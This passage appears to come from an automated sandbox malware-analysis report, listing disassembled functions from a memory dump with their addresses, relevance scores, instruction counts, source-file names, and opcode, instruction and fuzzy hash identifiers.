                                    • Opcode Fuzzy Hash: 13bc3140c1c30b5b1216a626d81ab7ba07a7aa1eab52ad4e6c41cac5efa07b13
                                    • Instruction Fuzzy Hash: 4D02A130C5DA8A9FEB95DB7488193FE7BF0FF19351F0405BAD828C6192DA38A558C742
                                    Function 00007FF887BB38B0 Relevance: .5, Instructions: 517COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0396da5b452b42d9c30d806783cad7bdc223f6fce493e3ebf3322fa7a35bd697
                                    • Instruction ID: 637f90385117acad1d3cca96d43fe0f33c3ee69c71087b0206e6e27ec5cd9046
                                    • Opcode Fuzzy Hash: 0396da5b452b42d9c30d806783cad7bdc223f6fce493e3ebf3322fa7a35bd697
                                    • Instruction Fuzzy Hash: 0D02A130C5DA8A9FEB95DB7488193FE7BF0FF19351F0405BAD828C6192DA38A558C742
                                    Function 00007FF887BB4E6D Relevance: .5, Instructions: 479COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e798fe5bdceffb2957327d1c431db37dcc3adc92fc9bcc5194a491378ffb7236
                                    • Instruction ID: b6b9d76dfea21cab0a20b248736a1a8ef9d4afb2805aa747f93abea9a8afff61
                                    • Opcode Fuzzy Hash: e798fe5bdceffb2957327d1c431db37dcc3adc92fc9bcc5194a491378ffb7236
                                    • Instruction Fuzzy Hash: 2BF1B03089DA8A8FEB85EB6488192FE7BF0FF15340F4005BAD829C3192DB386558C742
                                    Function 00007FF887BB4828 Relevance: .5, Instructions: 477COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1a3f4636981aa4645f6bfd8489471fa42a88baa5fa22aa6fd8b9c799f93a6fe
                                    • Instruction ID: 58e9b461160ed165683f61b639bc4126945c45b422a67e2517d989649b1bab62
                                    • Opcode Fuzzy Hash: e1a3f4636981aa4645f6bfd8489471fa42a88baa5fa22aa6fd8b9c799f93a6fe
                                    • Instruction Fuzzy Hash: F6F1B230C5DA8A9FEB95DB7488193FE7BF0FF19351F0405BAD828C2192DA38A558C742
                                    Function 00007FF887BAD888 Relevance: .4, Instructions: 437COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6f01713b798ad422a5d6e26c9b08a2c528804bf1f3d19c3a47acea012a42ca68
                                    • Instruction ID: f8e685a47ca8f98f1661860f64989740a57a5180841490a8475151316e01c471
                                    • Opcode Fuzzy Hash: 6f01713b798ad422a5d6e26c9b08a2c528804bf1f3d19c3a47acea012a42ca68
                                    • Instruction Fuzzy Hash: 3FF11770D596998FEB98EBA8C4557BCB7B2FF58340F4401BAD01ED72D6CA386884CB41
                                    Function 00007FF887BBE69A Relevance: .4, Instructions: 358COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 841193660b443c8ed0546259f0e67b46d2350b8997705d58d4dad3ebe5c0c5c1
                                    • Instruction ID: d630ed57be8b8243576f0bb1aa5cd1236ad97140db471f8bcda9b0fc1d924a87
                                    • Opcode Fuzzy Hash: 841193660b443c8ed0546259f0e67b46d2350b8997705d58d4dad3ebe5c0c5c1
                                    • Instruction Fuzzy Hash: 7DD19E305585568FEB49CF18C4D05B93BB2FF45350B5445BDCD8B8B6AACA38F882CB81
                                    Function 00007FF887BB5F21 Relevance: .3, Instructions: 337COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dfcd98b384ba6cb30608683f6309d50860efc10233d76ed9382d6eb83d1e42e5
                                    • Instruction ID: 6070c80e29a460fea0008d5cc8c4ac3357aa75a3e0ef38b3d34c78d78bd47e74
                                    • Opcode Fuzzy Hash: dfcd98b384ba6cb30608683f6309d50860efc10233d76ed9382d6eb83d1e42e5
                                    • Instruction Fuzzy Hash: DBB18F3094D68A8FEB95EB2488197FE7BF1FF56344F0405BAD818C7192DB386958C742
                                    Function 00007FF887BB5038 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 87ea8f53abbe37289095be960d7b64b8756f4ba8f7ee2ee8be1ce83cce3c4ffa
                                    • Instruction ID: bee571856b1989bba226ad4ae18db24aef0069a5d480cefc5e49fd850ec623f2
                                    • Opcode Fuzzy Hash: 87ea8f53abbe37289095be960d7b64b8756f4ba8f7ee2ee8be1ce83cce3c4ffa
                                    • Instruction Fuzzy Hash: AEB18130D9DA8A8FE755EB2488192FE7BF1FF15340F4405BAD819C2192EB78A558C742
                                    Function 00007FF887BB7601 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c392816663d5e0169f5e701fbfe31dee682d5361358cbe06fb6c663d79d82bb
                                    • Instruction ID: e690829815186ee86cc66c029e373c7b209e45b1ff6db53514a955a5897ce9e6
                                    • Opcode Fuzzy Hash: 2c392816663d5e0169f5e701fbfe31dee682d5361358cbe06fb6c663d79d82bb
                                    • Instruction Fuzzy Hash: 70B19830D8864A8FEB91EB68C8586FD7BF1FF19340F1804BBD819D7192DA38A484CB51
                                    Function 00007FF887BB5FB9 Relevance: .3, Instructions: 285COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 53661f499b651b0bf08cdfe5487ea4bf391604cac9fbc7c48e61cae3fa98ba22
                                    • Instruction ID: cec8c59d520f51ae3466c50c2e4562002d18ab4cd8afb5da649913951602bd9f
                                    • Opcode Fuzzy Hash: 53661f499b651b0bf08cdfe5487ea4bf391604cac9fbc7c48e61cae3fa98ba22
                                    • Instruction Fuzzy Hash: 71A17F3094DA8A8FEB95EB2488597BD7BF1FF56344F0405BAD818C3192DF386958CB42
                                    Function 00007FF887BBDF6D Relevance: .3, Instructions: 276COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b9983a8e112425f38caba4305009077e2d6823549b27607dc59e76c09fe9f62b
                                    • Instruction ID: 8a775e58d4261a0205f2f3eec8e47ea3b84027d1aca7179e8b9475b189f75e3c
                                    • Opcode Fuzzy Hash: b9983a8e112425f38caba4305009077e2d6823549b27607dc59e76c09fe9f62b
                                    • Instruction Fuzzy Hash: DCA1A530A5CA468FE749DB28C4916A8B7B2FF54340F54817DC94EC7AA6DB38F851CB81
                                    Function 00007FF887BB3878 Relevance: .3, Instructions: 262COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 43fc612d01e6a12f0448b6670c305446a34f60d0cccb9bf28626cbd8501defba
                                    • Instruction ID: d3a31c2d656048597704a21397269674bd2ae7e32211950dea8efba6b70c7bf2
                                    • Opcode Fuzzy Hash: 43fc612d01e6a12f0448b6670c305446a34f60d0cccb9bf28626cbd8501defba
                                    • Instruction Fuzzy Hash: A391D130D4CA8A8FEB85EB74C8596BD7BF1FF19350F0505BAD818C71A6DA38A444C742
                                    Function 00007FF887BA1DBB Relevance: .2, Instructions: 237COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f091c3680fb21b4e6eb27f95ce0aec63cdcb79c1a12a93c05dc4d998dc40af87
                                    • Instruction ID: 840d2fd8a95b65c6c12f4809928b9f4f7c55c1427bd92f0aac351c3e83bbd428
                                    • Opcode Fuzzy Hash: f091c3680fb21b4e6eb27f95ce0aec63cdcb79c1a12a93c05dc4d998dc40af87
                                    • Instruction Fuzzy Hash: D4719031A48A4A8BDB88EE1898516BEB7F2FF98344F14417AD55EC3281DE35A802C781
                                    Function 00007FF887BBF6C1 Relevance: .2, Instructions: 202COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fd8cb3647a5eb40c9ef254fbfc8ceb97a50aff5d7bbb7307eca259a5968581c5
                                    • Instruction ID: cd3ec2339618361a0ce4eb8be12ff7895943d2d6b14fef4322952da966ec8d37
                                    • Opcode Fuzzy Hash: fd8cb3647a5eb40c9ef254fbfc8ceb97a50aff5d7bbb7307eca259a5968581c5
                                    • Instruction Fuzzy Hash: D181BF30958B068FD369CF28C594669B7F2FF54340B50497DC99AC7A96DB78F842CB80
                                    Function 00007FF887BB60D8 Relevance: .2, Instructions: 195COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0990f117f88dc0d061daece7092d9d0504d3fded41c17fd6247295ad2e5c2fbc
                                    • Instruction ID: d525b7cdb85e69a4540d39d32236df3990fe16cbef5bd6d0ff00a2e339e9be80
                                    • Opcode Fuzzy Hash: 0990f117f88dc0d061daece7092d9d0504d3fded41c17fd6247295ad2e5c2fbc
                                    • Instruction Fuzzy Hash: CE618E30D4D68A8FFB95AB2488597BD7BB1FF56344F0405BAD918C3192DF386948CB42
                                    Function 00007FF887BFE098 Relevance: .2, Instructions: 183COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 51be85deb94e67e51c73397c9878b34064eacfd34469b9be0e1efed1158fa5ca
                                    • Instruction ID: 7a62f1b2684542458b13e5e5f6018de26bbaf1b68310cfa1d907f2b0f65d8859
                                    • Opcode Fuzzy Hash: 51be85deb94e67e51c73397c9878b34064eacfd34469b9be0e1efed1158fa5ca
                                    • Instruction Fuzzy Hash: C4519E70D58A4E8FEB98DB68C4556FDBBB2FF58341F51017AD419D3192CE386881C781
                                    Function 00007FF887BBB081 Relevance: .2, Instructions: 181COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b6a7ddc74598a03e3aaed429cb7678eba7147d79b1dd4a25565751a4fb0fe9dc
                                    • Instruction ID: 5d22cc9e719dba390b60c6e9b2a2647e9b9a92599db62ba15e89886a5d0545eb
                                    • Opcode Fuzzy Hash: b6a7ddc74598a03e3aaed429cb7678eba7147d79b1dd4a25565751a4fb0fe9dc
                                    • Instruction Fuzzy Hash: 59518D30D58A8E8FDB84DFA8C855AFE7BB2FF55340F10007AD50AD7292CA386901CB41
                                    Function 00007FF887BAC828 Relevance: .2, Instructions: 173COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9a4476683ad8da2ea424faca08b127198e913b1f303f9b53e3eefa9341cbbf3c
                                    • Instruction ID: 3bf887899c57a55f90b9e616aa35c8cfc18e6dde17ae58d751870c79a62316e3
                                    • Opcode Fuzzy Hash: 9a4476683ad8da2ea424faca08b127198e913b1f303f9b53e3eefa9341cbbf3c
                                    • Instruction Fuzzy Hash: E1518E3095E68E8FEB55EB68C9182FEBBB1FF19344F0004BBD419C61D6EA38A954C741
                                    Function 00007FF887C04850 Relevance: .2, Instructions: 172COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4f1d8f2ad2456f21d5c03c6eb05f211eeec9acd07a85c01758ee03d996f0843
                                    • Instruction ID: 99d85910d4f62eb629c22036e85f8c58bad61f59e12944e46229e9252a17624e
                                    • Opcode Fuzzy Hash: a4f1d8f2ad2456f21d5c03c6eb05f211eeec9acd07a85c01758ee03d996f0843
                                    • Instruction Fuzzy Hash: B3518330D5969E8FEB51EB64C8086FE7BF5FF4A340F00057AD409E7196DA38A944CB91
                                    Function 00007FF887BAA8AB Relevance: .2, Instructions: 164COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79418b26bd253390875f4fe0b07007858f3c7ae42b578043b1d59d3d13bfd862
                                    • Instruction ID: 5360fd731c3da6e617bf36c21a6dbc9cee5971e0f03c54dec1e33fc9dabf2611
                                    • Opcode Fuzzy Hash: 79418b26bd253390875f4fe0b07007858f3c7ae42b578043b1d59d3d13bfd862
                                    • Instruction Fuzzy Hash: 5351C43094E68A8FE742FB6888585EDBBF1FF5A340F0545B7D418C7092EA38A448D752
                                    Function 00007FF887BA31FB Relevance: .2, Instructions: 158COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7e7cc98f6edfd19c15639675d87a99d965af81193371872af984a8d5f28e48bc
                                    • Instruction ID: f78885ea5d7cf46843ac4d048a816295a82f804dfaf8ee106d37170e7bc0c704
                                    • Opcode Fuzzy Hash: 7e7cc98f6edfd19c15639675d87a99d965af81193371872af984a8d5f28e48bc
                                    • Instruction Fuzzy Hash: B4511470D4961E8FEB54EBA8C5956EDBBF2FF58351F50403AD00DE7292DA38A984CB40
                                    Function 00007FF887BB8E28 Relevance: .1, Instructions: 149COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 240bb643cef2b64b24a19283f01426382274e73558065186b5bef9636a3b0a91
                                    • Instruction ID: 201843c2351795ebc6b5e69b4477cea98de1fb6e9b1dbb0035e95282be20d995
                                    • Opcode Fuzzy Hash: 240bb643cef2b64b24a19283f01426382274e73558065186b5bef9636a3b0a91
                                    • Instruction Fuzzy Hash: A451397094891E8FDBA4EF18C844BEAB7F1FB59344F0001BAD91DE3251DB34AA85CB80
                                    Function 00007FF887BB70CD Relevance: .1, Instructions: 143COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1e5de54f8e6836825236310350a59426464dc39172e1cba9bfba34fecf3ab94
                                    • Instruction ID: 10a3036a3d4b426e154e97f6ea39d939effd283084792cf79c9aedb57da2abd2
                                    • Opcode Fuzzy Hash: e1e5de54f8e6836825236310350a59426464dc39172e1cba9bfba34fecf3ab94
                                    • Instruction Fuzzy Hash: 2751BB3084CA4A8FEB55DF64C8592BD7BF2FF59340F1801BBD819C6196DA39A844CB91
                                    Function 00007FF887BA2195 Relevance: .1, Instructions: 139COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9d760311c01f79396e3607161a81ad608837569d272b7aa85f16fb22dbe22de2
                                    • Instruction ID: 8ff2fdde20b44aa41750f267c953627216da394f187280f9b551adba81ca6e14
                                    • Opcode Fuzzy Hash: 9d760311c01f79396e3607161a81ad608837569d272b7aa85f16fb22dbe22de2
                                    • Instruction Fuzzy Hash: BA41393194E68A4FE786E7B888456FDBBF1FF86380B0405BBD44CC3192DD289881C342
                                    Function 00007FF887BB97C9 Relevance: .1, Instructions: 139COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9a61e2db3eb4c0202d4449e8a27959fda022954f48617734cf1af6b69e7fc443
                                    • Instruction ID: 02692b19f93933d38c55e71847dd5090ad72342d089cfd516b45a9e1ec3382f7
                                    • Opcode Fuzzy Hash: 9a61e2db3eb4c0202d4449e8a27959fda022954f48617734cf1af6b69e7fc443
                                    • Instruction Fuzzy Hash: F8411B70E4851D8FDBA4EB58D895BEDB3B6FF59340F1001A9E50DE3281CA35AA81CB40
                                    Function 00007FF887BAE6F3 Relevance: .1, Instructions: 132COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7d4e5c87edbb6cda852ce602e9e6b1f0f54474155fa2dbdd26b041326c6bba6a
                                    • Instruction ID: 0f10a774b0bd04f2b0c8f1ac455a6dd0b96470b5b78a50f2b68c0405d4478b87
                                    • Opcode Fuzzy Hash: 7d4e5c87edbb6cda852ce602e9e6b1f0f54474155fa2dbdd26b041326c6bba6a
                                    • Instruction Fuzzy Hash: 84510670D05A5A8FDBA8EA18CC957FAB7B2FB54342F5041EAC40DE3291DE34A985CF41
                                    Function 00007FF887BBCE79 Relevance: .1, Instructions: 110COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1bdc6dd60a285a0f8a63a56f33ae88647ece1f0b879a2f2b9b70007ee0097d05
                                    • Instruction ID: 200bfee249db8f82c059d7bc1f655e7e5b16dd741c2ed380fcb478958e375562
                                    • Opcode Fuzzy Hash: 1bdc6dd60a285a0f8a63a56f33ae88647ece1f0b879a2f2b9b70007ee0097d05
                                    • Instruction Fuzzy Hash: 6E318031E9C91ACFE7A4C79898959BD77B2FF48390B1409B6E90ED7191CA287C00E741
                                    Function 00007FF887BB88BA Relevance: .1, Instructions: 106COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: faa5862785243d51fefabe967c6b38352974a8bb07c5d8dc1feff3a47282c91b
                                    • Instruction ID: 8a0888c743628004e77c79ce21e99d46e322fcea02a28dd41b3e39b6075a1690
                                    • Opcode Fuzzy Hash: faa5862785243d51fefabe967c6b38352974a8bb07c5d8dc1feff3a47282c91b
                                    • Instruction Fuzzy Hash: 68316235D4892D8FEFA4DB1888857ED73B2FB54350F4051BAC54DE3181DE34A94ACB81
                                    Function 00007FF887BA37BA Relevance: .1, Instructions: 96COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7fe49e44621fed3baa87d1e128be3e65304de20e5250c1c849e559590ddb99fd
                                    • Instruction ID: 343f2cff7bfb6434a817437def1f33b23d143a259c9a64adaa7a8ea327a787a2
                                    • Opcode Fuzzy Hash: 7fe49e44621fed3baa87d1e128be3e65304de20e5250c1c849e559590ddb99fd
                                    • Instruction Fuzzy Hash: E631CF7190DA0E8FE748EF68E8153AC7BF1EB9A391F50007AC00DC72D6CBB918558B41
                                    Function 00007FF887BB8641 Relevance: .1, Instructions: 79COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a8d3def349d4b372cc17336e530984971f186a7d5180da5a4668842b2d0ee6c
                                    • Instruction ID: dfd94a371b6342182d3c5860653abac09482b89e3daf3b415cf4879e82714238
                                    • Opcode Fuzzy Hash: 0a8d3def349d4b372cc17336e530984971f186a7d5180da5a4668842b2d0ee6c
                                    • Instruction Fuzzy Hash: 5821CD31D4891C8FDB68EF5494816FDB7B1FB69350F00153AD51EE3181DA75A981CB80
                                    Function 00007FF887BBD5D4 Relevance: .1, Instructions: 79COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7c1cebcd5ede6b7994f34c0b80a11ca12729f07da9eb9f6fc1996066293a7309
                                    • Instruction ID: 68841de7440c152f0ddf3fb073908a02a49b9e2bf1a807d855b3e1a7fd074d19
                                    • Opcode Fuzzy Hash: 7c1cebcd5ede6b7994f34c0b80a11ca12729f07da9eb9f6fc1996066293a7309
                                    • Instruction Fuzzy Hash: 8C210930A9CE868BE6689A18514513D72F3FF9D384B24193DDE8FD3292DE6CB8028645
                                    Function 00007FF887BABFCB Relevance: .1, Instructions: 78COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
